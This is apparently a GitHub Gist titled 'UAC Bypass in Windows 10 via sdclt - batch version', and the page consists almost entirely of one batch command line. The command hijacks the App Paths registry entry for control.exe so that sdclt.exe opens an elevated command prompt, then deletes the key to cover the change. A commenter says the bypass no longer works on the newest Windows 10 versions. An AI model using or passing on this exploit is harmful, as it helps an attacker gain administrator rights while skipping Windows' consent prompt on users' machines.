Created
June 9, 2017 07:06
-
-
Save netbiosX/bb566a9c7444c375b5bbac07576072b1 to your computer and use it in GitHub Desktop.
UAC Bypass in Windows 10 via sdclt - batch version
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This is an old bypass and no longer works in newest Windows 10 versions.